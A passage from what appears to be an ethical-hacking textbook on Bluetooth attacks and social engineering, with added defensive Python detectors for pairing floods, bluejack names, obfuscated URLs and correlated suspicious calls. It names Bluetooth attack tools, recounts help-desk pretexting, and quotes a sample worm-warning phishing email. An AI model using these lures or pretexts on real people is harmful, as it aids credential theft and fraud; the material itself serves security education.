controllers.
Dial-up internet access on personal computers or PDAs using a
data-capable mobile phone as a modem.
ii. Bluetooth Hacking
Bluetooth provides an easy way of communication for a wide range of
mobile devices to communicate with each other without the need for
cables or wires and transfer files in between them. Bluetooth hacking
has gained popularity recently with an increasing amount of software
becoming available to hackers for gaining access to Bluetooth devices.
Most of the hacking tools seem to be for the Linux platform and include
names such as BlueScan, BlueSniff and BTBrowser.
iii. Various Bluetooth based attacks
How would a potential hacker exploit the Bluetooth radio in your
handheld device? Bluetooth attacks often have cute names that belie
their true intentions. Here are some of the most popular Bluetooth
hacks.
Bluesnarfing. Bluesnarfing attacks involve a hacker covertly gaining
access to your Bluetooth-enabled device for the purpose of retrieving
information, including addresses, calendar information or even the
device's International Mobile Equipment Identity (IMEI). The IMEI
identifies the handset rather than the subscription, so on its own it
does not let an attacker redirect your calls, but it is still data you
do not want disclosed.
Bluesnarfing was a bigger problem on cell phones between 2003 and
2004. It is hard to do, and the necessary software can be tough to obtain.
Firmware updates have reduced the threat considerably. In addition,
placing your phone in a non-discoverable mode makes it harder on the
attacker, because he then needs additional software to locate your
Bluetooth signal.
Bluebugging. Bluebugging means hacking into a Bluetooth device and
using the commands of that device without notifying or alerting the user.
By bluebugging, a hacker could eavesdrop on phone conversations, place
phone calls, send and receive text messages, and even connect to the
Internet.
Bluebugging exploits a different vulnerability than bluesnarfing. It's a
firmware issue commonly associated with older cell phones. In the lab we
were more successful with bluesnarfing than bluebugging.
Bluejacking. Bluetooth devices have the ability to send so-called wireless
business cards. A recent trend has been to send anonymous business
cards with offensive messages, and frankly, it's easy to do. But it doesn't
put data in jeopardy.
Bluejacking requires an attacker to be within 10 meters of a device. If
someone bluejacks you, you could probably see his face. Never add
bluejack messages to your contacts list. And to avoid the nuisance
altogether, simply put your phone on non-discoverable mode.
Denial of service
DOS attacks occur when an attacker uses his Bluetooth device to
repeatedly request pairing with the victim's device. Unlike on the
Internet, where this type of constant request can bring down services, a
Bluetooth DOS attack is mostly just a nuisance, since no information
can be transferred, copied or attained by the attacker.
DOS attacks are the easiest to perform and can drain a device's battery
or temporarily paralyze the phone or PDA. However, since this attack
relies on the proximity of the attacker to the victim, it's easy to stop. Just
walk away.
In the Lab, we were able to perform DOS attacks on every Bluetooth
device we tested. Currently, there are few software defenses against this
type of assault.
iv. Various Software for Bluetooth Hacking
BlueScanner
BTBrowser
BTCrawler
BlueJacking
BlueSnarfing
MagicBlueHack
BluetoothHack
BlueScanner – It searches for Bluetooth devices and extracts a large
amount of information about each newly discovered device.
BlueSniff – It is a simple utility for discovering hidden Bluetooth devices.
BlueBugger - It simply exploits the BlueBug vulnerability of the
Bluetooth enabled devices. By exploiting these vulnerabilities and leaks,
you can gain access to the phone-book, calls lists and other information
of the Bluetooth device. Bluebugging involves hacking into a phone using
device commands without the user noticing. If the hacker were
successful, they could listen in on phone conversations, make phone
calls and send or receive text messages. Bluebugging has a similar result
to bluesnarfing but exploits a different vulnerability that is found in older
phones.
BTBrowser – Bluetooth Browser is a J2ME app which can browse and
explore all the surrounding Bluetooth devices and display different
kinds of device information.
BTCrawler – It is a Bluetooth scanner for Windows Mobile based devices.
It can implement BlueJacking and BlueSnarfing attacks.
Bluesnarfing - Bluesnarfing involves gaining unauthorized access to a
Bluetooth enabled device for the purpose of accessing or stealing
personal information or files. This form of Bluetooth hacking is probably
the most difficult for the hacker to achieve and recent firmware upgrades
to Bluetooth devices have reduced the risk. Your best form of protection
is to not leave your phone in discoverable mode.
Bluejacking - Bluejacking is a mostly harmless activity and usually
involves sending a vCard (electronic business card) to another Bluetooth
device with an offensive message in the name field. As most Bluetooth
devices are still in the 10 meter range, the person who "Bluejacked" you
is likely to be in the same room.
If you are concerned, your best form of protection is to keep your device's
Bluetooth turned off when not in use. And when Bluetooth is turned on,
make sure you don't leave it in discoverable mode.
v. Bluetooth Hacking Example for Fun and Profit
WiFi wardriving tools have now advanced to the point where it is less a
sign of techno-machismo and more a sign of social maladjustment to
actually go out and wardrive in your neighborhood. Software Defined
Radio is a good suggestion, but you're limited to the frequencies you can
use without relatively expensive equipment. Another recommendation
might be investigating the security characteristics of your Bluetooth
enabled device.
Bluejacking became a relatively popular sport last year. According to the
Bluejackq with a Q site, Bluejacking is the sending of unsolicited
messages to unsuspecting Bluetooth device owners for fun.
Bluejacking works because many people leave their phone in the "visible"
state. This means it's viewable by other Bluetooth devices within range.
The bluejacker takes advantage of the fact that Bluetooth device names
can be as long as 254 characters, temporarily changing the bluejacking
device's name to include a saucy message like "Mama, konna toi tokoro
made, yuko oide kudasaimashita *." When sent, the target phone displays
a message like '"Mama, konna toi tokoro made, yuko oide kudasaimashita."
just sent you a message.' The social goal of Bluejacking appears to be to
use a message interesting enough that the receiver does not pay attention
to the "just sent you a message." part of the alert, but not so
interesting that the sender would be arrested for violating local
obscenity regulations.
Bluejacking is a mostly harmless activity. Though it is an unintended
use of a technical feature, most hard-core geeks do not find sufficient
technical challenge in the activity. For the more serious hacker, looking
to explore the security features of their handset, a more technically
demanding sport is required.
To get an idea of the types of security vulnerabilities with which
Bluetooth device owners must contend, there are a number of good
resources a few mouse clicks away. After a little investigation, the next
step is to install and/or configure a Bluetooth networking stack on the
device of choice. The ever-popular Linux operating system is a good
choice for persons wishing to experiment with a broad range of Bluetooth
features. BlueZ is a Bluetooth networking stack that runs on Linux.
BlueSniff and RedFang are two popular applications that eavesdrop on
Bluetooth conversations. BTScanner is a tool that will query your device
and report common settings; very useful when trying to figure out if a
device is susceptible to attack.
* "Mama, konna toi tokoro made, yuko oide kudasaimashita," is
Japanese for "My Goodness! What a pleasure to see you in this neck of
the woods."
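Of the attacks described in this section, two leave traces a defender can actually observe: a bluejack payload travels in the device name seen during an inquiry scan, and a Bluetooth DoS shows up as a burst of pairing requests from one address. The following Python script is an added example and is not from the original text or from any of the tools listed above. It triages constructed inquiry-scan results and a constructed pairing-request log; the record format, the addresses and the thresholds are assumptions made for the demonstration, not the output of any real Bluetooth stack.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed inquiry-scan results as (address, friendly name).
# These are not real devices; the message name reuses the example above.
SCAN_RESULTS = [
    ("00:11:22:33:44:55", "Nokia 6310i"),
    ("00:11:22:33:44:66", "Mama, konna toi tokoro made, yuko oide kudasaimashita."),
    ("00:11:22:33:44:77", "Visit http://example.invalid now!"),
    ("00:11:22:33:44:88", "JohnsLaptop"),
]

# Constructed pairing-request log; the line format is an assumption made
# for this example, not the format of any particular Bluetooth stack.
PAIRING_LOG = """\
2013-05-01 10:00:01 PAIRING_REQUEST from 00:11:22:33:44:66
2013-05-01 10:00:02 PAIRING_REQUEST from 00:11:22:33:44:66
2013-05-01 10:00:03 PAIRING_REQUEST from 00:11:22:33:44:55
2013-05-01 10:00:04 PAIRING_REQUEST from 00:11:22:33:44:66
2013-05-01 10:00:06 PAIRING_REQUEST from 00:11:22:33:44:66
2013-05-01 10:00:08 PAIRING_REQUEST from 00:11:22:33:44:66
2013-05-01 10:00:10 PAIRING_REQUEST from 00:11:22:33:44:66
2013-05-01 10:00:30 PAIRING_REQUEST from 00:11:22:33:44:99
2013-05-01 10:05:30 PAIRING_REQUEST from 00:11:22:33:44:99
"""

WORD_RE = re.compile(r"[A-Za-z]+")
URL_RE = re.compile(r"https?://|www\.", re.IGNORECASE)
LINE_RE = re.compile(r"^(\S+ \S+) PAIRING_REQUEST from ([0-9A-F:]{17})$")


def looks_like_message(name: str, max_plain_len: int = 32) -> bool:
    """Heuristic for a bluejack-style device name. Ordinary names are short
    product or owner labels; a message payload is long, contains a URL, or
    reads like a sentence (several words plus sentence punctuation)."""
    if len(name) > max_plain_len or URL_RE.search(name):
        return True
    words = WORD_RE.findall(name)
    return len(words) >= 4 and any(c in name for c in ".!?")


def suspicious_names(results):
    """Return the (address, name) pairs whose name looks like a message."""
    return [(addr, name) for addr, name in results if looks_like_message(name)]


def pairing_floods(log_text: str, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Map each address that sent at least `threshold` pairing requests inside
    any `window_seconds` window to the largest such burst it produced."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events[m.group(2)].append(datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"))
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for addr, times in events.items():
        times.sort()
        start, largest = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # slide the window forward
                start += 1
            largest = max(largest, end - start + 1)
        if largest >= threshold:
            flagged[addr] = largest
    return flagged


if __name__ == "__main__":
    for addr, name in suspicious_names(SCAN_RESULTS):
        print(f"message-like name from {addr}: {name!r}")
    for addr, count in pairing_floods(PAIRING_LOG).items():
        print(f"pairing flood from {addr}: {count} requests within 60 s")
```

The name heuristic is deliberately loose: its job is to surface candidates for a human to look at, and the text's own observation that the attacker must be within 10 meters is what makes the follow-up (walk away, switch to non-discoverable) cheap.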
CHAPTER 23
Social Engineering
Objective
23.1 Introduction
23.2 Social Engineering methods for hacking
23.3 Common Types of Attacks
23.4 Social-Engineering Countermeasures
23.1 Introduction
Social engineering is a term that describes a non-technical kind of
intrusion that relies heavily on human interaction and often involves
tricking other people to break normal security procedures.
A social engineer runs what used to be called a "con game." For example,
a person using social engineering to break into a computer network
might try to gain the confidence of an authorized user and get them to
reveal information that compromises the network's security. Social
engineers often rely on the natural helpfulness of people as well as on
their weaknesses.
Social engineering is a component of many, if not most, types of exploits.
Virus writers use social engineering tactics to persuade people to
run malware-wrapped email attachments, phishers use social
engineering to convince people to divulge sensitive information, and
scareware vendors use social engineering to frighten people into running
software that is useless at best and dangerous at worst.
Another aspect of social engineering relies on people's inability to keep
up with a culture that relies heavily on information technology. Social
engineers rely on the fact that people are not aware of the value of the
information they possess and are careless about protecting it.
Frequently, social engineers will search dumpsters for valuable
information, memorize access codes by looking over someone's shoulder
(shoulder surfing), or take advantage of people's natural inclination to
choose passwords that are meaningful to them but can be easily
guessed.
Security experts propose that as our culture becomes more dependent on
information, social engineering will remain the greatest threat to any
security system. Prevention includes educating people about the value of
information, training them to protect it, and increasing people's
awareness of how social engineers operate.171
Social engineering is a nontechnical method of breaking into a system or
network. It’s the process of deceiving users of a system and convincing
them to give out information that can be used to defeat or bypass
security mechanisms. Social engineering is important to understand
because hackers can use it to attack the human element of a system and
circumvent technical security measures. This method can be used to
gather information before or during an attack.
Social Engineering Term
Social engineering is the use of influence and persuasion to deceive
people for the purpose of obtaining information or persuading a victim to
perform some action. A social engineer commonly uses the telephone or
Internet to trick people into revealing sensitive information or to get them
to do something that is against the security policies of the organization.
By this method, social engineers exploit the natural tendency of a person
to trust their word, rather than exploiting computer security holes. It’s
generally agreed that users are the weak link in security; this principle is
what makes social engineering possible.
The following is an example of social engineering recounted by Kapil
Raina, currently a security expert at Verisign, based on an actual
workplace experience with a previous employer. “One morning a few
years back, a group of strangers walked into a large shipping firm and
walked out with access to the firm’s entire corporate network. How did
they do it? By obtaining small amounts of access, bit by bit, from a
171 http://searchsecurity.techtarget.com/definition/social-engineering
number of different employees in that firm. First, they did research about
the company for two days before even attempting to set foot on the
premises. For example, they learned key employees’ names by calling HR.
Next, they pretended to lose their key to the front door, and a man let
them in. Then they “lost” their identity badges when entering the third
floor secured area, smiled, and a friendly employee opened the door for
them. The strangers knew the CFO was out of town, so they were able to
enter his office and obtain financial data off his unlocked computer. They
dug through the corporate trash, finding all kinds of useful documents.
They asked a janitor for a garbage pail in which to place their contents
and carried all of this data out of the building in their hands.
The strangers had studied the CFO’s voice, so they were able to phone,
pretending to be the CFO, in a rush, desperately in need of his network
password. From there, they used regular technical hacking tools to gain
super-user access into the system.
In this case, the strangers were network consultants performing a
security audit for the CFO without any other employees’ knowledge. They
were never given any privileged information from the CFO but were able
to obtain all the access they wanted through social engineering.”
The most dangerous part of social engineering is that companies with
authentication processes, firewalls, virtual private networks, and
network-monitoring software are still wide open to attacks, because
social engineering doesn’t assault the security measures directly.
Instead, a social-engineering attack bypasses the security measures and
goes after the human element in an organization.
23.2 Social Engineering methods for hacking
Social engineering includes the acquisition of sensitive information or
inappropriate access privileges by an outsider, based on the building of
inappropriate trust relationships. The goal of a social engineer is to trick
someone into providing valuable information or access to that
information. It preys on qualities of human nature, such as the desire to
be helpful, the tendency to trust people, and the fear of getting in
trouble. Hackers who are able to blend in and appear to be a part of the
organization are the most successful at social-engineering attacks. The
following example illustrates the use of social engineering.
The facilitator of a live Computer Security Institute demonstration
showed the vulnerability of help desks when he dialed up a phone
company, got transferred around, and reached the help desk. “Who’s the
supervisor on duty tonight?” “Oh, it’s Betty.” “Let me talk to Betty.” [He’s
transferred.] “Hi Betty, having a bad day?” “No, why? Your systems are
down.” She said, “My systems aren’t down, we’re running fine.” He said,
“You better sign off.” She signed off. He said, “Now sign on again.” She
signed on again. He said, “We didn’t even show a blip, we show no
change.” He said, “Sign off again.” She did. “Betty, I’m going to have to
sign on as you here to figure out what’s happening with your ID. Let me
have your user ID and password.” So this senior supervisor at the help
desk tells him her user ID and password. In a few minutes a hacker is
able to get information that might have taken him days to get by
capturing traffic and cracking the password. It is much easier to gain
information by social engineering than by technical methods. People are
usually the weakest link in the security chain. A successful defense
depends on having good policies in place and teaching employees to
follow the policies. Social engineering is the hardest form of attack to
defend against because a company can’t protect itself with hardware or
software alone.172
23.3 Common Types Of Attacks
Social engineering can be broken into two common types:
Human-based: Human-based social engineering refers to person-
to-person interaction to retrieve the desired information. An
example is calling the help desk and trying to find out a password.
Computer-based: Computer-based social engineering refers to
having computer software that attempts to retrieve the desired
information. An example is sending a user an e-mail and asking
them to reenter a password in a web page to confirm it. This social-
engineering attack is also known as phishing.
We’ll look at each of these more closely in the following sections.
172 http://www.symantec.com
23.3.1 Human-Based Social Engineering
Human-based social engineering techniques can be broadly
categorized as follows:
i. Impersonating an employee or valid user: In this type of social-
engineering attack, the hacker pretends to be an employee or valid
user on the system. A hacker can gain physical access by
pretending to be a janitor, employee, or contractor. Once inside the
facility, the hacker gathers information from trashcans, desktops,
or computer systems.
ii. Posing as an important user: In this type of attack, the hacker
pretends to be an important user such as an executive or high-
level manager who needs immediate assistance to gain access to a
computer system or files. The hacker uses intimidation so that a
lower-level employee such as a help-desk worker will assist them
in gaining access to the system. Most low-level employees won’t
question someone who appears to be in a position of authority.
iii. Using a third person: Using the third-person approach, a hacker
pretends to have permission from an authorized source to use a
system. This attack is especially effective if the supposed
authorized source is on vacation or can’t be contacted for
verification.
iv. Calling technical support: Calling tech support for assistance is a
classic social-engineering technique. Help-desk and technical
support personnel are trained to help users, which makes them
good prey for social-engineering attacks.
v. Shoulder surfing: Shoulder surfing is a technique of gathering
passwords by watching over a person’s shoulder while they log in
to the system. A hacker can watch a valid user log in and then use
that password to gain access to the system.
vi. Dumpster diving: Dumpster diving involves looking in the trash for
information written on pieces of paper or computer printouts. The
hacker can often find passwords, filenames, or other pieces of
confidential information.
A more advanced method of gaining illicit information is known as
reverse social engineering. Using this technique, a hacker creates a
persona that appears to be in a position of authority so that employees
ask the hacker for information, rather than the other way around. For
example, a hacker can impersonate a help-desk employee and get the
user to give them information such as a password.
23.3.2 Computer-Based Social Engineering
Computer-based social engineering attacks can include the following:
Mail/IM attachments: An attacker can send malicious attachments
to an innocent victim via mail/IM.
Pop-up windows: Pop-up windows simulate an urgent condition on
a user’s computer and request sensitive information to restore it to
the normal state.
Spam mail: Spam mail can contain fraudulent billing information,
etc. and can make payment requests or ask for other information.
Web sites: Fake Web sites, often posing as financial institutions, can be
used to request confidential information such as passwords or social
security numbers.
i. Phishing
Phishing involves sending an e-mail, usually posing as a bank, credit-
card company, or other financial organization. The e-mail requests that
the recipient confirm banking information or reset passwords or PINs.
The user clicks the link in the e-mail and is redirected to a
fake website. The hacker is then able to capture this information and use
it for financial gain or to perpetrate other attacks. E-mails that claim the
senders have a great amount of money but need your help getting it out
of the country are examples of phishing attacks. These attacks prey on
the common person and are aimed at getting them to provide bank
account access codes or other confidential information to the hacker.
ii. On-Line Social Engineering
The Internet is fertile ground for social engineers looking to harvest
passwords. The primary weakness is that many users often repeat the
use of one simple password on every account: Yahoo, Travelocity, and
Gap.com, whatever. So once the hacker has one password, he or she
can probably get into multiple accounts. One way in which hackers
have been known to obtain this kind of password is through an on-
line form: they can send out some sort of sweepstakes information
and ask the user to put in a name (including e-mail address – that
way, she might even get that person’s corporate account password as
well) and password.
Another way hackers may obtain information on-line is by pretending
to be the network administrator, sending e-mail through the network
and asking for a user’s password. This type of social engineering
attack doesn’t generally work, because users are generally more aware
of hackers when online, but it is something of which to take note.
Furthermore, pop-up windows can be installed by hackers to look like
part of the network and request that the user reenter his username
and password to fix some sort of problem. At this point in time, most
users should know not to send passwords in clear text (if at all), but it
never hurts to have an occasional reminder of this simple security
measure from the System Administrator. Even better, sysadmins
might want to warn their users against disclosing their passwords in
any fashion other than a face-to-face conversation with a staff
member who is known to be authorized and trusted.
iii. E-mail can also be used for more direct means of gaining access to a
system. For instance, mail attachments sent from an apparently authentic
sender can carry viruses, worms and Trojan horses. A good
example of this was an AOL hack, documented by VIGILANTe: “In that
case, the hacker called AOL’s tech support and spoke with the
support person for an hour. During the conversation, the hacker
mentioned that his car was for sale cheaply. The tech supporter was
interested, so the hacker sent an e-mail attachment ‘with a picture of
the car’. Instead of a car photo, the mail executed a backdoor exploit
that opened a connection out from AOL through the firewall.”173
iv. Online Scams
Some websites that make free offers or other special deals can lure a
victim to enter a username and password that may be the same as those
they use to access their work system. The hacker can use this valid
173 http://www.symantec.com/connect/articles/social-engineering-fundamentals-
username and password once the user enters the information in the
website form.
Mail attachments can be used to send malicious code to a victim’s
system, which could automatically execute something like a software
keylogger to capture passwords. Viruses, Trojans and worms can be
included in cleverly crafted e-mails to entice a victim to open the
attachment. Mail attachments are considered a computer-based social
engineering attack. Here is an example of an e-mail scam which tries to
convince the receiver to open an unsafe attachment:
Mail server report:
Our firewall determined the e-mails containing worm copies are being sent
from your computer.
Nowadays it happens from many computers, because this is a new virus
type (Network Worms).
Using the new bug in the Windows, these viruses infect the computer
unnoticeably.
After the penetrating into the computer the virus harvests all the e-mail
addresses and sends the copies of itself to these e-mail addresses.
Please install updates for worm elimination and your computer restoring.
Best regards,
Customer support service
Pop-up windows can also be used in computer-based social-engineering
attacks, in a similar manner to e-mail attachments. Pop-up windows
with special offers or free stuff can encourage a user to unintentionally
install malicious software.
v. URL Obfuscation
URL is the Uniform Resource Locator and is commonly used in the
address bar of a web browser to access a particular website. In lay terms
it is the website address. URL obfuscation is the hiding of a fake URL in
what appears to be a legitimate website address. For example, a website of
204.13.144.2/Citibank may appear to be a legitimate web address for
Citibank but in fact is not. URL obfuscation is used in phishing attacks
and some online scams to make the scam seem more legitimate. A
website address may be seen as an actual financial institution name or
logo, but the hyperlink leads to a fake website or IP address. When the
user clicks the hyperlink, they’re redirected to the hacker’s site.
Addresses can be obfuscated in malicious links by the use of
hexadecimal or decimal notations.
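To see what URL obfuscation hides, a defender resolves a link to the host a browser would actually contact and compares that with what the reader sees. The following Python example is added here and is not from the original text. It decodes the decimal, hexadecimal and octal IP notations mentioned above, and the trick in which a brand name precedes an "@" so that it becomes user-info rather than the host. It reuses the 204.13.144.2/Citibank address from the text; the other link forms and the brand-word check are constructed for the demonstration, and the example goes beyond the text in also accepting shortened dotted forms such as 204.13.36866, which inet_aton-style parsers treat as the same address.

```python
import ipaddress
import re
from urllib.parse import urlsplit


def _int_part(part: str) -> int:
    """Parse one dotted component the way inet_aton does:
    0x.. is hex, a leading 0 is octal, anything else is decimal."""
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p[0] == "0" and p.isdigit():
        return int(p, 8)
    if p.isdigit():
        return int(p, 10)
    raise ValueError(part)


def normalize_host(host: str) -> str:
    """If host is an IPv4 address in decimal, hex, octal or shortened dotted
    form, return it as a dotted quad; otherwise return the lowercased name."""
    host = host.lower()
    try:
        nums = [_int_part(p) for p in host.split(".")]
    except ValueError:
        return host  # contains letters other than a 0x prefix: a DNS name
    if not 1 <= len(nums) <= 4:
        return host
    value = 0
    for n in nums[:-1]:
        if n > 255:
            return host
        value = (value << 8) | n
    tail_bytes = 5 - len(nums)  # the last component fills the remaining bytes
    if nums[-1] >= 256 ** tail_bytes:
        return host
    value = (value << (8 * tail_bytes)) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def analyze_link(display_text: str, href: str) -> dict:
    """Compare the text a reader sees with the host the link really points to.
    Returns the real host, whether it is a bare IP, and a list of warnings."""
    parts = urlsplit(href)
    raw_host = parts.hostname or ""
    actual_host = normalize_host(raw_host)
    flags = []
    try:
        ipaddress.ip_address(actual_host)
        is_numeric = True
        flags.append("numeric host instead of a domain name")
    except ValueError:
        is_numeric = False
    if raw_host != actual_host:
        flags.append(f"host written in non-standard notation ({raw_host})")
    if parts.username is not None:
        flags.append(f"user-info before '@' ({parts.username}) is not the host")
    displayed = urlsplit(display_text).hostname if "://" in display_text else None
    if displayed and normalize_host(displayed) != actual_host:
        flags.append(f"displayed host {displayed} differs from real host {actual_host}")
    # Brand words that appear in the path or user-info but not in the host
    # (e.g. .../Citibank on a bare IP) are a classic obfuscation tell.
    outside_host = (parts.path + " " + (parts.username or "")).lower()
    for token in sorted(set(re.findall(r"[a-z]{4,}", display_text.lower()))):
        if token in outside_host and token not in actual_host:
            flags.append(f"brand word '{token}' appears outside the host")
    return {"actual_host": actual_host, "is_numeric": is_numeric, "flags": flags}


if __name__ == "__main__":
    # Constructed link forms for the demonstration; the first is the text's example.
    samples = [
        ("Citibank", "http://204.13.144.2/Citibank"),
        ("http://www.citibank.com", "http://www.citibank.com@3423440898/login"),
        ("Citibank", "http://0xCC0D9002/Citibank"),
        ("www.example.com", "https://www.example.com/"),
    ]
    for shown, link in samples:
        result = analyze_link(shown, link)
        print(f"{shown!r} -> {link}\n  real host: {result['actual_host']}")
        for flag in result["flags"]:
            print(f"  ! {flag}")
```

Only the host is decoded here; path obfuscation with percent-encoding and look-alike Unicode domains are separate problems the same comparison approach can be extended to.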
23.4 Social-Engineering Countermeasures
The following are some best practices to help reduce the risk of a social
engineering attack against your organization being successful.
1. Never disclose passwords
This is fairly common sense, but ensure that you have policies in place
that passwords are never to be disclosed. Regularly inform staff that they
should never be asked for their password. Finally, ensure that you do not
have any exceptions to this policy. If it is sometimes okay to give out a
password, your users need to make a judgment call, and a clever social
engineer will find ways to exploit this. It is easy if the answer is
always no.
2. Limit IT Information being disclosed
Create a policy that only IT is able to discuss existing technology with
outsiders and designate a person to take survey and vendor calls about
the company's technology. A common technique is for the social engineer
to call one person in the company as a survey company and learn what
products are in use and then use that knowledge to represent themselves
as a vendor or support person for a product that is used.
Politely decline to participate in surveys, and if someone represents
themselves as your vendor on an unsolicited call, call back your vendor
contact to verify that the contact was legitimate.
3. Limit information in Out Of Office Messages
If your out-of-office reply messages leave the company, limit the
amount of information provided. Don't directly give alternate contact
names or numbers with direct lines or exact lengths of outages. You
should instead direct people to call the receptionist, who can provide
information as needed. Never tell outsiders you will be unreachable.
If a social engineer knows that you haven't been in the office for a week
and knows whom else to call, they can act as if they were already in an
active conversation with you; and if you indicated you cannot be reached,
they may claim promises were made and expect them to be fulfilled.
4. Escort guests in areas with Network Access
Do not leave guests alone in empty offices, waiting rooms, or conference
rooms with direct network access, especially if they are not someone
known to you. For all you know, the vendor presentation they scheduled
was a ruse to give them internal access to your network and run attacks.
5. Question people you don't know
If you see someone you are unfamiliar with in your company and they
are not displaying a badge, question their presence. This can be done
professionally. For example, introduce yourself and ask them what brings
them to your company today. If people are too afraid to question
strangers, it makes your company very easy to break in to.
6. Talk about security
Regularly talk to people about security and awareness so that they are
thinking about attacks. A good social engineer appears harmless so if
you are not on your guard and keeping your employees thinking about
what they say and do it is easy for an attack to succeed.
7. Centralize reporting of suspicious behavior
Finally, have an individual or small group that is made aware of any
suspicious behavior. A social engineer will typically contact multiple
people to gather enough information to launch an attack, counting on the
fact that they will not communicate with one another. If a pattern is
detected that looks like an attack, it is much easier to prevent harm.
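Item 7, and the survey-then-vendor pattern described in item 2, both come down to correlating reports that individual employees would never connect on their own. The following Python example is added here and is not from the original text: it shows what the central point of contact can do with the reports once they arrive in one place. The report records, names and phone numbers are constructed for the demonstration, and the 48-hour window and two-reporter threshold are assumptions a team would tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed reports filed with the central point of contact (not real data):
# who was contacted, by whom, what the caller claimed to be, and what they wanted.
REPORTS = [
    {"time": "2013-06-03 09:12", "reporter": "hr.clerk", "caller": "+1-555-0100",
     "claimed": "survey company", "asked_for": "names of IT staff"},
    {"time": "2013-06-03 14:40", "reporter": "reception", "caller": "+1-555-0100",
     "claimed": "survey company", "asked_for": "which firewall product is in use"},
    {"time": "2013-06-04 10:05", "reporter": "it.helpdesk", "caller": "+1-555-0100",
     "claimed": "vendor support", "asked_for": "remote access to the firewall"},
    {"time": "2013-06-04 11:30", "reporter": "it.helpdesk", "caller": "+1-555-0199",
     "claimed": "employee", "asked_for": "password reset"},
    {"time": "2013-06-20 16:00", "reporter": "hr.clerk", "caller": "+1-555-0100",
     "claimed": "survey company", "asked_for": "headcount"},
]


def correlate_reports(reports, window_hours=48, min_reporters=2):
    """Group reports by caller and flag any caller who reached at least
    `min_reporters` different employees inside a `window_hours` window.
    For a flagged caller, return the largest such cluster: the employees
    contacted, the personas used and the requests made, in order."""
    by_caller = defaultdict(list)
    for r in reports:
        by_caller[r["caller"]].append(
            dict(r, time=datetime.strptime(r["time"], "%Y-%m-%d %H:%M")))
    window = timedelta(hours=window_hours)
    campaigns = {}
    for caller, items in by_caller.items():
        items.sort(key=lambda r: r["time"])
        best = None
        for i, first in enumerate(items):
            # every report from this caller inside the window opened by report i
            cluster = [r for r in items[i:] if r["time"] - first["time"] <= window]
            reporters = {r["reporter"] for r in cluster}
            if len(reporters) >= min_reporters and (
                    best is None or len(reporters) > len(best["reporters"])):
                best = {
                    "reporters": reporters,
                    "personas": {r["claimed"] for r in cluster},
                    "requests": [r["asked_for"] for r in cluster],
                }
        if best is not None:
            campaigns[caller] = best
    return campaigns


if __name__ == "__main__":
    for caller, c in correlate_reports(REPORTS).items():
        print(f"{caller}: contacted {sorted(c['reporters'])} as {sorted(c['personas'])}")
        for req in c["requests"]:
            print(f"  asked for: {req}")
```

Keying on the caller's number is the simplest choice; in practice the same logic is run again keyed on the claimed identity, since an attacker who changes numbers often keeps the persona.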
Being able to identify how to combat social engineering is critical for any
certified ethical hacker. There are a number of ways to do this.
Documented and enforced security policies and security-awareness
programs are the most critical component in any information-security
program. Good policies and procedures aren’t effective if they aren’t
taught and reinforced to employees. The policies need to be
communicated to employees to emphasize their importance and then
enforced by management. After receiving security-awareness training,
employees will be committed to supporting the security policies of the
organization.
The corporate security policy should address how and when accounts are
set up and terminated, how often passwords are changed, who can access
what information, and how violations of the policy are to be handled.
It should also cover the help desk procedures for these tasks, as well as
how employees are identified, for example using an employee number or
other information to validate a password change. The destruction of paper
documents and physical access restrictions are additional areas the
security policy should address. Lastly, the policy should address
technical areas such as use of modems and virus control.
One of the advantages of a strong security policy is that it removes the
responsibility of employees to make judgment calls regarding a hacker’s
request. If the requested action is prohibited by the policy, the employee
has guidelines for denying it.
The most important countermeasure for social engineering is employee
education. All employees should be trained on how to keep confidential
data safe. Management teams are involved in the creation and
implementation of the security policy so that they fully understand it and
support it throughout the organization. The company security-awareness
policy should require all new employees to go through a security
orientation. Annual classes should be required to provide refreshers and
updated information for employees.
Another way to increase involvement is through a monthly newsletter
with security awareness articles.
***********************